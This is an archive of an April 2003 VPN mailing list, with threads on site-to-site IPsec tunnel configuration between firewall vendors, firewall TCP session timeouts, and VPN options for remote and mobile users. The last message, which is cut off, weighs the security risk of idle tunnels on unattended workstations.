From jsanders at teklinks.com Tue Apr 1 14:14:27 2003 From: jsanders at teklinks.com (Jeremy Sanders) Date: Tue, 01 Apr 2003 13:14:27 -0600 Subject: [VPN] VPN 3005 connected to Checkpoint Message-ID: We're having a problem getting a tunnel up between a 3005 and a checkpoint. I can't get the 3005 to try to initiate the connection. It's not even trying to establish phase 1. Any ideas? We've got the correct IP addresses and all of that information. It just won't even try to establish, even when we ping through it towards the remote network. Any ideas? Jeremy Sanders, CCNP RHCE CNE Senior Systems Engineer Teklinks, Inc. 205-249-5988 From shannong at texas.net Tue Apr 1 21:39:49 2003 From: shannong at texas.net (shannong) Date: Tue, 1 Apr 2003 20:39:49 -0600 Subject: [VPN] Use of VPN In-Reply-To: Message-ID: <002c01c2f8c1$26917a40$0101a8c0@ASTEROID> BTW...The Pix can do inbound user authentication before allowing a user access to a resource. Therefore, you could create a public access IPs for the web server/s and configure the Pix to authenticate inbound web sessions. SSL would provide encryption of course. The Internet at large would not have access to the servers, but rather only those users with valid credentials verified via RADIUS/TACACS+. This is much easier than providing and supporting VPN access for web servers. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of Bruce.CTR.Aron at faa.gov Sent: Thursday, September 05, 2002 11:55 AM To: Kejvan Redjamand Cc: vpn at lists.shmoo.com Subject: Re: [VPN] Use of VPN The app is on the company Intranet (internal Web), so people outside the company normally can't see or use the app. But in selected cases, the company wants selected people to be able to get to the app but nothing else on the Intranet. A complicating factor is that the company Intranet is not on one Web server -- there are multiple Web servers in multiple geographical locations. So a Web server access lists wouldn't help much either. And people may be using AOL or similar that don't have a static IP address for the client/user. Bruce Kejvan Redjamand cc: vpn at lists.shmoo.com Subject: Re: [VPN] Use of VPN 09/05/2002 01:47 PM Hi It seems that it may be done by CGI, APS,.. on a webserver with access restrictions, Why use VPN if web based? Kejv On Thu, 5 Sep 2002 Bruce.CTR.Aron at faa.gov wrote: > Subject: [VPN] Use of VPN > > I have one basic question -- is it possible to use VPN such that the remote > user has access to only one server (IP address) rather than everything on > the company intranet? > > The specific situation I am looking at is how best to allow "trusted" > non-company people to get inside the company intranet to access one > specific Web-based program and yet not let them get at the rest of the > company intranet. > _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From jaime.leon at motorola.com Tue Apr 1 22:43:11 2003 From: jaime.leon at motorola.com (Leon Jaime-AJL080) Date: Tue, 1 Apr 2003 21:43:11 -0600 Subject: [VPN] Cisco VPN 5000 client on Linux Message-ID: Guys, have any experienced issues while installing the Cisco VPN client on a Linux machine and using NAT? Authentication works and I see the IP being assigned to the machine, but that's it, it can not be reached afterwards. I have already setup the NAT on the vpn_config file. Any feedback will be highly appreciated. Thanks Jaime R. Leon iDEN Market System Engineer - Motorola Mexico Desk/Mobile: (5255)-5261 6944 / (5255)-1992 9070 Two-Way: bidir.5519929070 at msgnextel.com.mx Private ID: 1 * 2233 From Tim.Kokes at AugustTech.com Wed Apr 2 10:12:53 2003 From: Tim.Kokes at AugustTech.com (Kokes, Tim) Date: Wed, 2 Apr 2003 09:12:53 -0600 Subject: [VPN] VPN tunnel between Sidewinder 5.2.1.0.7 and Netscreen 5XP Message-ID: Has anyone configured a Site to Site VPN tunnel between a Sidewinder 5.2.1.0.7 and Netscreen 5XP? I've setup both peers and the SA does not like the way netscreen is formatted the VPN communication. Setup taken: NETSCREEN: VPN Tunnel: Gateway = YYY.YYY.YYY.YYY Static IP: XXX.XXX.XXX.XXX "Aggressive" Phase1 proposal = 3DES, SHA1, DH2 (pre-g2-3des-sha) pre-share = XXXXXX AutoIKE: Name = NT1-FW2 Remote gateway = FW2 Phase2 proposal = 3DES, SHA1, DH2, (nopfs-esp-3des-sha) Policy: NAME: NT1-FW2 Source, JAMACA (172.20.100.0) Destination, BLM.Corp (10.10.0.0) Service, ANY NAT, OFF Action, Tunnel "Check modify incoming VPN policy" Sidwinder: SA Netscreen-DSL-PRESHARE Local subnet = 10.10.0.0 /16 Remote = 172.20.100.0 /24 VPN Tunnel: Pre-Share Secret = XXXXXXX Accept = 3DES - SHA1 Phase1 = 28800 TTL 3DES, SHA1, DH2 Phase2 = 3600 TTL 3DES, SHA1, -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030402/2cca1659/attachment.htm From Mike.Hancock at sourcemed.net Wed Apr 2 10:24:24 2003 From: Mike.Hancock at sourcemed.net (Mike Hancock) Date: Wed, 2 Apr 2003 09:24:24 -0600 Subject: [VPN] Application timeouts over VPN...HELP! Message-ID: We have a good and solid VPN between a Checkpoint and a NetScreen, its up and solid. I can send 100 pings and get 100% response. Ping times across the tunnel are 63ms average. The developers for each company keep saying that the "firewall" is dropping the packets. And it is. Application A starts the session(syn), App B answers(synack), App A(ack)....no problem. The apps even talks out to the correct DST ports. Problem comes when App A tries to send info over the established session (example src port 2565) but sends it out 65 seconds since the last communications, the firewalls time out the session and App A should resend over a new source port. It never does. It will try till its dying days to communicate over that FIRST session. I am a router firewall guy and not a programmer, is there anything that I can do to lessen the problem from a firewall/VPN point of view? I keep saying that they need to speed up response times on their TCP communications and send "heartbeats". They call me "Non-Helpful" I just want to fix it. Any ideas? App A -----------------Checkpoint========INTERNET===========NetScreen--------- -------------App B _______________________________ Mike -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030402/605dae90/attachment.htm From alex at cipherica.com Wed Apr 2 13:33:39 2003 From: alex at cipherica.com (Alex Pankratov) Date: Wed, 02 Apr 2003 10:33:39 -0800 Subject: [VPN] Application timeouts over VPN...HELP! In-Reply-To: References: Message-ID: <3E8B2D03.9010308@cipherica.com> Mike Hancock wrote: > We have a good and solid VPN between a Checkpoint and a NetScreen, its > up and solid. I can send 100 pings and get 100% response. Ping times > across the tunnel are 63ms average. The developers for each company > keep saying that the "firewall" is dropping the packets. And it is. > Application A starts the session(syn), App B answers(synack), App > A(ack)....no problem. The apps even talks out to the correct DST ports. > Problem comes when App A tries to send info over the established session > (example src port 2565) but sends it out 65 seconds since the last > communications, the firewalls time out the session and App A should > resend over a new source port. It never does. It will try till its dying > days to communicate over that FIRST session. Regardless of the respective position of VPN terminator and the firewall, the problem is clearly in the firewall setup. I'm not an admin, so I'll leave troubleshooting to other people :) But .. > > I am a router firewall guy and not a programmer, is there anything that > I can do to lessen the problem from a firewall/VPN point of view? I keep > saying that they need to speed up response times on their TCP > communications and send "heartbeats". They call me "Non-Helpful" .. being a programmer myself I can comment on this though. Using application-level heartbeats to keep-alive *TCP* connection is not a good idea for a number of reasons. One of them is an unability to guarantee heartbeat intervals even with 10-sec precision (caused in part by traffic shaping and QoS-misbehaved routers), which renders the whole idea useless. /alex From dklein at netscreen.com Wed Apr 2 13:33:56 2003 From: dklein at netscreen.com (David Klein) Date: Wed, 2 Apr 2003 10:33:56 -0800 Subject: [VPN] VPN tunnel between Sidewinder 5.2.1.0.7 and Netscreen 5 XP Message-ID: <541402FFDC56DA499E7E13329ABFEA87C6C374@SARATOGA.netscreen.com> On the Netscreen does "get log event" show the reason for the IKE failure? You could also do a "debug ike basic" to find the problem. A couple of things to look for based on your information below: 1) "Aggressive" Do you have aggressive mode setup on the Sidewinder? Either change Sidewinder to Aggressive mode or Netscreen to Main mode for P1. 2) Source, JAMACA (172.20.100.0) Destination, BLM.Corp (10.10.0.0) Are the subnet masks correct on these? /24 and /16 respectively. Mismatched IP address and subnets will case IKE P2 proxy-id checks to fail. 3) Phase2 proposal = 3DES, SHA1, DH2, (nopfs-esp-3des-sha) This doesn't make sense. You've selected "nopfs" yet you mention DH2 which means you want to do PFS. Make sure these match between the two boxes. Dave Klein Netscreen Systems Engineer -----Original Message----- From: Kokes, Tim [mailto:Tim.Kokes at AugustTech.com] Sent: Wednesday, April 02, 2003 9:13 AM To: vpn at lists.shmoo.com Subject: [VPN] VPN tunnel between Sidewinder 5.2.1.0.7 and Netscreen 5XP Has anyone configured a Site to Site VPN tunnel between a Sidewinder 5.2.1.0.7 and Netscreen 5XP? I've setup both peers and the SA does not like the way netscreen is formatted the VPN communication. Setup taken: NETSCREEN: VPN Tunnel: Gateway = YYY.YYY.YYY.YYY Static IP: XXX.XXX.XXX.XXX "Aggressive" Phase1 proposal = 3DES, SHA1, DH2 (pre-g2-3des-sha) pre-share = XXXXXX AutoIKE: Name = NT1-FW2 Remote gateway = FW2 Phase2 proposal = 3DES, SHA1, DH2, (nopfs-esp-3des-sha) Policy: NAME: NT1-FW2 Source, JAMACA (172.20.100.0) Destination, BLM.Corp (10.10.0.0) Service, ANY NAT, OFF Action, Tunnel "Check modify incoming VPN policy" Sidwinder: SA Netscreen-DSL-PRESHARE Local subnet = 10.10.0.0 /16 Remote = 172.20.100.0 /24 VPN Tunnel: Pre-Share Secret = XXXXXXX Accept = 3DES - SHA1 Phase1 = 28800 TTL 3DES, SHA1, DH2 Phase2 = 3600 TTL 3DES, SHA1, -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030402/5b3d990c/attachment.htm From puja.puri at cdac.ernet.in Wed Apr 2 23:37:02 2003 From: puja.puri at cdac.ernet.in (puja) Date: Thu, 03 Apr 2003 10:07:02 +0530 Subject: [VPN] End to End VPNs and iterated tunnels Message-ID: <3E8BBA6E.2020002@cdac.ernet.in> hello list I have an IPSec implementation with me. I am trying to set up a End-to-End VPN. The scenerio is like this: C1---------Gi==================G2---------C2 I want to set up ESP tunnel mode between G1 and G2 and AH transport between C1 and C2, at the same time. (Both these policies are currently working independently but not working when configured together ) How should be the configuration done in this scenerio ? Does gateway need to know that the clients are doing some IPSec processing ? Thanks in advance Regards Puja Puri From safieradam at hotmail.com Wed Apr 2 14:00:02 2003 From: safieradam at hotmail.com (safieradam) Date: Wed, 2 Apr 2003 14:00:02 -0500 Subject: [VPN] VPN and FW separated or integrated ? References: <20030331143046.88870.qmail@web21405.mail.yahoo.com> Message-ID: The VPN 3000 series is targeted at user to gateway VPN and has a good feature set in that respect. I've only seen the PIX used for site-site VPN. The VPN 3000 will let you set up access groups and if you want you can assign IP pools to the groups. The client seems to have an IP from the pool even though the ISP gave them something totally different. This allows internal firewalls/routers to filter the VPN users by IP pool if your resources are distributed by department/group. If all your servers are lumped on one subnet and you have minimal access control you can set up ACL's on the Cisco box itself. You can also track the user by the IP address throughout the internal network and, if you go to the trouble, your IDS alarms can be cross referenced to the VPN log to identify the user ID that set off the alarms. The GUI and command line commands are easy to use and you don't really need to know Cisco IOS. I set up a 3015 concentrator and Cisco clients to work with PKI and smart cards for authentication and suffered through only minor tech glitches. You also have Radius and Active Directory authentication options. However, you should be ready for Cisco to claim glitches are features and point the finger at everyone else until they have a scheduled upgrade release that may or may not fix the problem. Still, the stuff works well for the most part. You might also want to look at other products as mentioned by others. To size your system consider how many simultaneous users will be on at the same time and what your usage profile is going to be. i.e. 300 users can translate to 3 simultaneous users at any one time or to 300 VPN connections up 10 hrs/day simultaneously. Do you need to drop connections that are idle for x-minutes for security/performance reasons or do you need to keep idle connections up for fast response? Do you do split tunneling (bad security) or do you have users go through your corporate proxy to surf the web (performance/capacity issues). Try to profile the traffic as best you can then develop some requirements then look at products. Finally, the brain dead French have legal limitations on VPN encryption strength, key escrow and generally an incompetent world security outlook. Check your local laws before doing much of anything in France. Adam Safier ----- Original Message ----- From: "Rudi Pierquin" To: Sent: Monday, March 31, 2003 9:30 AM Subject: [VPN] VPN and FW separated or integrated ? > Hi, > > We are currently looking to implement a homeworking > solution for max 300 users. For this matter, i am > wondering if any of you could tell me what is the > benifit in buying separetly VPN and firewall device. > More specifically, comparing the Cisco VPN3000 box > with the PIX firewall, can somebody tell me why should > i use a VPN3000 box if a PIX535 with 6.3 software on > it give me all the VPN and FW capabilities I could > dream of ? > > Many thanks, > > Rudi > > ___________________________________________________________ > Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en fran?ais ! > Yahoo! Mail : http://fr.mail.yahoo.com > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > From safieradam at hotmail.com Thu Apr 3 10:13:27 2003 From: safieradam at hotmail.com (safieradam) Date: Thu, 3 Apr 2003 10:13:27 -0500 Subject: [VPN] Application timeouts over VPN...HELP! References: Message-ID: MessageThere is a timer for TCP in the FW 4.1 policy properties menu. I think the default is 60 seconds but it may be 40. It's been a while. Anyway, you might change that so the firewall gives TCP sessions much longer to get established. I don't remember on Netscreen but it should also have a time out option. Also, try sending large pings and just to make sure that still works (you are checking MTU size limits, just in case.) However, you should point out to the "developers" that if their application is to work on anything but the one link, especially over the internet with other companies, they need to fix it. Firewalls are becoming a networking fact of life and their application will always have problems unless they adopt and design for that fact now. They need to have error checking in their code and not go into endless loops. Your idea for a heartbeat is OK if they can't get the performance to improve but the application better be a batch job and not have user interaction. They may also need to control MTU size. Make sure they _don't_ set the do not fragment bit on. Sounds to me like they are in a rush, don't have good network programming experience and are leaving error checking to be added on when they have time, at some future point that will never come. I would be concerned about what they are doing to make the application secure. Adam Safier ----- Original Message ----- From: Mike Hancock To: vpn at lists.shmoo.com Sent: Wednesday, April 02, 2003 10:24 AM Subject: [VPN] Application timeouts over VPN...HELP! We have a good and solid VPN between a Checkpoint and a NetScreen, its up and solid. I can send 100 pings and get 100% response. Ping times across the tunnel are 63ms average. The developers for each company keep saying that the "firewall" is dropping the packets. And it is. Application A starts the session(syn), App B answers(synack), App A(ack)....no problem. The apps even talks out to the correct DST ports. Problem comes when App A tries to send info over the established session (example src port 2565) but sends it out 65 seconds since the last communications, the firewalls time out the session and App A should resend over a new source port. It never does. It will try till its dying days to communicate over that FIRST session. I am a router firewall guy and not a programmer, is there anything that I can do to lessen the problem from a firewall/VPN point of view? I keep saying that they need to speed up response times on their TCP communications and send "heartbeats". They call me "Non-Helpful" I just want to fix it. Any ideas? App A -----------------Checkpoint========INTERNET===========NetScreen----------------------App B _______________________________ Mike -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030403/70c26a0f/attachment.htm From hakan.palm at generic.se Thu Apr 3 16:37:28 2003 From: hakan.palm at generic.se (hakan.palm at generic.se) Date: Thu, 3 Apr 2003 23:37:28 +0200 Subject: Ang: [VPN] Application timeouts over VPN...HELP! Message-ID: Mike, have you tried tweaking the timers in the firewalls? Usually you can modify the idletime a firewall allows before considering a TCP-session stale and closes it. I do believe you can change the relevant settings for FW-1 in the object.C file. I guess there's a spiffy knob somewhere in the GUI you kan fiddle with otherwise... HTH /Palm Mike.Hancock at sourcemed.net 2003-04-02 20:24 Till: vpn at lists.shmoo.com @ INTERNET Kopia: (Blank: Hakan Palm/Generic) ?rende: [VPN] Application timeouts over VPN...HELP! We have a good and solid VPN between a Checkpoint and a NetScreen, its up and solid. I can send 100 pings and get 100% response. Ping times across the tunnel are 63ms average. The developers for each company keep saying that the "firewall" is dropping the packets. And it is. Application A starts the session(syn), App B answers(synack), App A(ack)....no problem. The apps even talks out to the correct DST ports. Problem comes when App A tries to send info over the established session (example src port 2565) but sends it out 65 seconds since the last communications, the firewalls time out the session and App A should resend over a new source port. It never does. It will try till its dying days to communicate over that FIRST session. I am a router firewall guy and not a programmer, is there anything that I can do to lessen the problem from a firewall/VPN point of view? I keep saying that they need to speed up response times on their TCP communications and send "heartbeats". They call me "Non-Helpful" I just want to fix it. Any ideas? App A -----------------Checkpoint========INTERNET===========NetScreen--------- -------------App B _______________________________ Mike -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030403/a0461966/attachment.htm From Mike.Hancock at sourcemed.net Fri Apr 4 07:24:08 2003 From: Mike.Hancock at sourcemed.net (Mike Hancock) Date: Fri, 4 Apr 2003 06:24:08 -0600 Subject: [VPN] Application timeouts over VPN...HELP! Message-ID: We can reset the timers (a global setting in CP and NS) but sometimes the applications do not interact for a couple of hours and I had rather not make sessions viable for hours at a time. Mike -----Original Message----- From: safieradam [mailto:safieradam at hotmail.com] Sent: Thursday, April 03, 2003 9:13 AM To: Mike Hancock; vpn at lists.shmoo.com Subject: Re: [VPN] Application timeouts over VPN...HELP! There is a timer for TCP in the FW 4.1 policy properties menu. I think the default is 60 seconds but it may be 40. It's been a while. Anyway, you might change that so the firewall gives TCP sessions much longer to get established. I don't remember on Netscreen but it should also have a time out option. Also, try sending large pings and just to make sure that still works (you are checking MTU size limits, just in case.) However, you should point out to the "developers" that if their application is to work on anything but the one link, especially over the internet with other companies, they need to fix it. Firewalls are becoming a networking fact of life and their application will always have problems unless they adopt and design for that fact now. They need to have error checking in their code and not go into endless loops. Your idea for a heartbeat is OK if they can't get the performance to improve but the application better be a batch job and not have user interaction. They may also need to control MTU size. Make sure they _don't_ set the do not fragment bit on. Sounds to me like they are in a rush, don't have good network programming experience and are leaving error checking to be added on when they have time, at some future point that will never come. I would be concerned about what they are doing to make the application secure. Adam Safier ----- Original Message ----- From: Mike Hancock To: vpn at lists.shmoo.com Sent: Wednesday, April 02, 2003 10:24 AM Subject: [VPN] Application timeouts over VPN...HELP! We have a good and solid VPN between a Checkpoint and a NetScreen, its up and solid. I can send 100 pings and get 100% response. Ping times across the tunnel are 63ms average. The developers for each company keep saying that the "firewall" is dropping the packets. And it is. Application A starts the session(syn), App B answers(synack), App A(ack)....no problem. The apps even talks out to the correct DST ports. Problem comes when App A tries to send info over the established session (example src port 2565) but sends it out 65 seconds since the last communications, the firewalls time out the session and App A should resend over a new source port. It never does. It will try till its dying days to communicate over that FIRST session. I am a router firewall guy and not a programmer, is there anything that I can do to lessen the problem from a firewall/VPN point of view? I keep saying that they need to speed up response times on their TCP communications and send "heartbeats". They call me "Non-Helpful" I just want to fix it. Any ideas? App A -----------------Checkpoint========INTERNET===========NetScreen--------- -------------App B _______________________________ Mike -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030404/59be50ef/attachment.htm From rrsarge at medclinic.net Fri Apr 4 13:45:41 2003 From: rrsarge at medclinic.net (Randy Sargent) Date: Fri, 4 Apr 2003 12:45:41 -0600 Subject: [VPN] Decapsulated packet does not match tunnel id Message-ID: SEF 7.0/Win2K PRO/SP2 I have one particular tunnel with a SonicWALL SOHO2 that is giving me fits. It will work fine for a little while and then I get this: IP packet dropped (192.168.10.78->10.0.0.3: Protocol=TCP[SYN] Port 4802->80): Decapsulated packet does not match tunnel id 6.isakmp.1414 at xxx.xxx.xxx.xxx This is driving me nuts! Has anyone seen this before? Randy Sargent -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030404/b5dafee9/attachment.htm From safieradam at hotmail.com Sat Apr 5 18:44:09 2003 From: safieradam at hotmail.com (safieradam) Date: Sat, 5 Apr 2003 18:44:09 -0500 Subject: [VPN] Application timeouts over VPN...HELP! References: Message-ID: MessageThe 65 seconds in your original method is one thing. Keeping the session up and idle for hours is a big difference. I would whip out the "New" security policy and point out to the developers that leaving sessions open for hours is bad security and not allowed. If you are not in charge of security policy get the policy person on your side and have them talk to the developers. This is really a political negotiation but your instinct not to allow it is correct. Adam Safier ----- Original Message ----- From: Mike Hancock To: safieradam ; vpn at lists.shmoo.com Sent: Friday, April 04, 2003 7:24 AM Subject: RE: [VPN] Application timeouts over VPN...HELP! We can reset the timers (a global setting in CP and NS) but sometimes the applications do not interact for a couple of hours and I had rather not make sessions viable for hours at a time. Mike -----Original Message----- From: safieradam [mailto:safieradam at hotmail.com] Sent: Thursday, April 03, 2003 9:13 AM To: Mike Hancock; vpn at lists.shmoo.com Subject: Re: [VPN] Application timeouts over VPN...HELP! There is a timer for TCP in the FW 4.1 policy properties menu. I think the default is 60 seconds but it may be 40. It's been a while. Anyway, you might change that so the firewall gives TCP sessions much longer to get established. I don't remember on Netscreen but it should also have a time out option. Also, try sending large pings and just to make sure that still works (you are checking MTU size limits, just in case.) However, you should point out to the "developers" that if their application is to work on anything but the one link, especially over the internet with other companies, they need to fix it. Firewalls are becoming a networking fact of life and their application will always have problems unless they adopt and design for that fact now. They need to have error checking in their code and not go into endless loops. Your idea for a heartbeat is OK if they can't get the performance to improve but the application better be a batch job and not have user interaction. They may also need to control MTU size. Make sure they _don't_ set the do not fragment bit on. Sounds to me like they are in a rush, don't have good network programming experience and are leaving error checking to be added on when they have time, at some future point that will never come. I would be concerned about what they are doing to make the application secure. Adam Safier ----- Original Message ----- From: Mike Hancock To: vpn at lists.shmoo.com Sent: Wednesday, April 02, 2003 10:24 AM Subject: [VPN] Application timeouts over VPN...HELP! We have a good and solid VPN between a Checkpoint and a NetScreen, its up and solid. I can send 100 pings and get 100% response. Ping times across the tunnel are 63ms average. The developers for each company keep saying that the "firewall" is dropping the packets. And it is. Application A starts the session(syn), App B answers(synack), App A(ack)....no problem. The apps even talks out to the correct DST ports. Problem comes when App A tries to send info over the established session (example src port 2565) but sends it out 65 seconds since the last communications, the firewalls time out the session and App A should resend over a new source port. It never does. It will try till its dying days to communicate over that FIRST session. I am a router firewall guy and not a programmer, is there anything that I can do to lessen the problem from a firewall/VPN point of view? I keep saying that they need to speed up response times on their TCP communications and send "heartbeats". They call me "Non-Helpful" I just want to fix it. Any ideas? App A -----------------Checkpoint========INTERNET===========NetScreen----------------------App B _______________________________ Mike -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030405/296a81ae/attachment.htm From tbird at precision-guesswork.com Sat Apr 5 19:51:12 2003 From: tbird at precision-guesswork.com (Tina Bird) Date: Sun, 6 Apr 2003 00:51:12 +0000 (GMT) Subject: [VPN] X*X*X administrivia Message-ID: <20030406004624.L3623-100000@sisyphus.iocaine.com> *sigh* many list members' mail servers have bounced this message due to its offensive content. now, i find failed security associations as offensive as the next person, maybe even more offensive than the next person, but i don't think they're worth bouncing emails due to content filtering ;-) two points: 1) if you want to hide IP addresses, choosing masks other than x-x-x is probably a good idea if you don't want to trigger this sort of problem 2) management retains the right to arbitrarily unsubscribe list members whose mail servers send me excessive numbers of bounce messages (where excessive is defined by, oh, the kind of week i've had at work) back to regular programming -- tbird -- "I knew it! I knew it! Well, not in the sense of having the slightest idea, but I knew there was something I didn't know." -- Willow, from "Buffy the Vampire Slayer" http://www.shmoo.com/~tbird Log Analysis http://www.loganalysis.org VPN http://vpn.shmoo.com ---------- Forwarded message ---------- Date: Fri, 4 Apr 2003 12:45:41 -0600 From: Randy Sargent To: "vpn at lists.shmoo.com" Subject: [VPN] Decapsulated packet does not match tunnel id SEF 7.0/Win2K PRO/SP2 I have one particular tunnel with a SonicWALL SOHO2 that is giving me fits. It will work fine for a little while and then I get this: IP packet dropped (192.168.10.78->10.0.0.3: Protocol=TCP[SYN] Port 4802->80): Decapsulated packet does not match tunnel id 6.isakmp.1414 at xxx.xxx.xxx.xxx This is driving me nuts! Has anyone seen this before? Randy Sargent From alex at cipherica.com Sat Apr 5 20:09:46 2003 From: alex at cipherica.com (Alex Pankratov) Date: Sat, 05 Apr 2003 17:09:46 -0800 Subject: [VPN] Application timeouts over VPN...HELP! In-Reply-To: References: Message-ID: <3E8F7E5A.2070401@cipherica.com> safieradam wrote: > The 65 seconds in your original method is one thing. Keeping the session > up and idle for hours is a big difference. I would whip out the "New" > security policy and point out to the developers that leaving sessions > open for hours is bad security and not allowed. Adam, can you explain why *exactly* it's a "bad security" ? Especially given that the TCP connection in question is IPsec'ed in first place. [snip] > Adam Safier [snip] From aquamjb at mac.com Tue Apr 8 12:41:07 2003 From: aquamjb at mac.com (Michael Burns) Date: Tue, 8 Apr 2003 09:41:07 -0700 Subject: [VPN] VPN help Message-ID: Hi, Am looking into to find information to see if there is VPN for the T-Mobile Sidekick (wireless mobile pager, more in Danger.com). Reason to have the VPN is that I could use to communicate with my engineers within the division both in and out of campus. Am deaf and am usually working with highly senstive projects which would require me to have secure access to my email or to corporate website. This VPN would greatly help lot if there is a way to use in the mobile wireless pager like the Sidekick. Thanks and hope there is info that would apply to this wireless pager. Or you might know one who could help me out? Or can contact the Danger.com group to see what would work. Michael Burns From osmond at holburn.com Wed Apr 9 07:53:59 2003 From: osmond at holburn.com (Chad Osmond) Date: Wed, 9 Apr 2003 07:53:59 -0400 Subject: [VPN] VPN help References: Message-ID: <002f01c2fe8e$b66af830$1902a8c0@Polk> > Am looking into to find information to see if there is VPN for the > T-Mobile Sidekick (wireless mobile pager, more in Danger.com). Reason > to have the VPN is that I could use to communicate with my engineers > within the division both in and out of campus. Am deaf and am usually > working with highly senstive projects which would require me to have > secure access to my email or to corporate website. This VPN would > greatly help lot if there is a way to use in the mobile wireless pager > like the Sidekick. > Have you considered the IPAQ line? The IPAQ 3970's are really nice, the next model up has WLAN access built in, with Thumb Pad Biometrics for security, There are many VPN clients for this device, us GPRS to get data back and forth when WiLAN is unavailable. Blackberry also rings a bell, their PIM device has access in most metro areas. (But may not be encryptable) (See RIM's Site to see what they have) Considering that this is e-mail you need, in most cases it is transferred in plain text across the Internet (unless you're using encryption), consider the weakest link factor. From garry.rees at hall-woodhouse.co.uk Wed Apr 9 11:39:54 2003 From: garry.rees at hall-woodhouse.co.uk (Garry Rees) Date: Wed, 9 Apr 2003 16:39:54 +0100 Subject: [VPN] Ip addresses In-Reply-To: <20030409120005.46813.42133.Mailman@sisyphus.iocaine.com> Message-ID: <003101c2feae$45a1ee40$42010180@GarryWIN2000> I'm a novice, struggling at the moment to configure some laptops (for home use) with Netscreen remote and a Netscreen 25 firewall. I have got the connections working.ie I can VPN in to the company network from home via a ADSL connection, access Windows servers, unix servers, run programs, download upload etc but am stuck with one thing. I want to print from a unix box in the company to the home laptop. To do this I have to print to a specific IP address. I want to be able to give my laptop at home a specific IP address that can go through my firewall so that my unix box can print to this IP address. At the moment I can log onto and ping the unix box from home but cannot ping the home laptop from unix (or windows) network when on site. I have tried (but don't fully understand) mapped and dynamic addresses and think I need policies, on incoming and outgoing, to route the print data from unix out to the laptop. I can give my laptop a fixed IP address but cannot ping it from unix or windows even when I am VPN'd in and logged onto the server. Any help would be appreciated as to what I am missing (apart from enough grey cells) GR -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com]On Behalf Of vpn-request at lists.shmoo.com Sent: 09 April 2003 13:00 To: vpn at lists.shmoo.com Subject: VPN digest, Vol 1 #151 - 2 msgs Send VPN mailing list submissions to vpn at lists.shmoo.com To subscribe or unsubscribe via the World Wide Web, visit http://lists.shmoo.com/mailman/listinfo/vpn or, via email, send a message with subject or body 'help' to vpn-request at lists.shmoo.com You can reach the person managing the list at vpn-admin at lists.shmoo.com When replying, please edit your Subject line so it is more specific than "Re: Contents of VPN digest..." Today's Topics: 1. Re: Application timeouts over VPN...HELP! (Alex Pankratov) 2. VPN help (Michael Burns) --__--__-- Message: 1 Date: Sat, 05 Apr 2003 17:09:46 -0800 From: Alex Pankratov To: vpn at lists.shmoo.com Subject: Re: [VPN] Application timeouts over VPN...HELP! safieradam wrote: > The 65 seconds in your original method is one thing. Keeping the session > up and idle for hours is a big difference. I would whip out the "New" > security policy and point out to the developers that leaving sessions > open for hours is bad security and not allowed. Adam, can you explain why *exactly* it's a "bad security" ? Especially given that the TCP connection in question is IPsec'ed in first place. [snip] > Adam Safier [snip] --__--__-- Message: 2 Date: Tue, 8 Apr 2003 09:41:07 -0700 From: Michael Burns To: vpn at lists.shmoo.com Subject: [VPN] VPN help Hi, Am looking into to find information to see if there is VPN for the T-Mobile Sidekick (wireless mobile pager, more in Danger.com). Reason to have the VPN is that I could use to communicate with my engineers within the division both in and out of campus. Am deaf and am usually working with highly senstive projects which would require me to have secure access to my email or to corporate website. This VPN would greatly help lot if there is a way to use in the mobile wireless pager like the Sidekick. Thanks and hope there is info that would apply to this wireless pager. Or you might know one who could help me out? Or can contact the Danger.com group to see what would work. Michael Burns --__--__-- _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn End of VPN Digest ________________________________________________________________________ This e-mail has been scanned for all viruses by Star Internet. The service is powered by MessageLabs. For more information on a proactive anti-virus service working around the clock, around the globe, visit: http://www.star.net.uk ________________________________________________________________________ **************************************************** This email and any content are confidential and intended solely for the use of the individual or entity to which it is addressed. Opinions expressed are not necessarily those of Hall & Woodhouse Ltd. Disclosure, copying, distribution or use is prohibited and may be unlawful. Every endeavour has been made to ensure that this Email and any attachments are virus free, nevertheless any attachments to this Email should be virus checked. If received in error please notify enquiries at hall-woodhouse.co.uk Visit our Websites at: www.badgerbrewery.com www.badgerdirect.com www.tanglefoot.co.uk www.drinkrio.com and www.pandapops.com ______________________________________________________________________ This e-mail has been scanned for all viruses by Star Internet. The service is powered by MessageLabs. For more information on a proactive anti-virus service working around the clock, around the globe, visit: http://www.star.net.uk ________________________________________________________________________ From rmalayter at bai.org Wed Apr 9 13:36:40 2003 From: rmalayter at bai.org (Ryan Malayter) Date: Wed, 9 Apr 2003 12:36:40 -0500 Subject: [VPN] Application timeouts over VPN...HELP! Message-ID: <792DE28E91F6EA42B4663AE761C41C2AEA0B@cliff.bai.org> From: Alex Pankratov [mailto:alex at cipherica.com] >can you explain why *exactly* it's >a "bad security" ? Especially given >that the TCP connection in question >is IPsec'ed in first place. If the tunnel is left open, and the engineer's workstation is online and idle, the workstation becomes a vector for compromising the security of the encrypted traffic. If the workstation is unmanned, and the screen is accidentally left unlocked, someone could walk up and compromise the shared secret key by looking at the Ipsec cleint settings. Or someone could walk up and hack the OS (many prviliege-elevation hacks on Windows NT/2000/XP and other OS require console access), or use a debugging tool to dump the memory and find the shared secrets or session keys. These attacks could be nearly as harmful as if the tunnel was 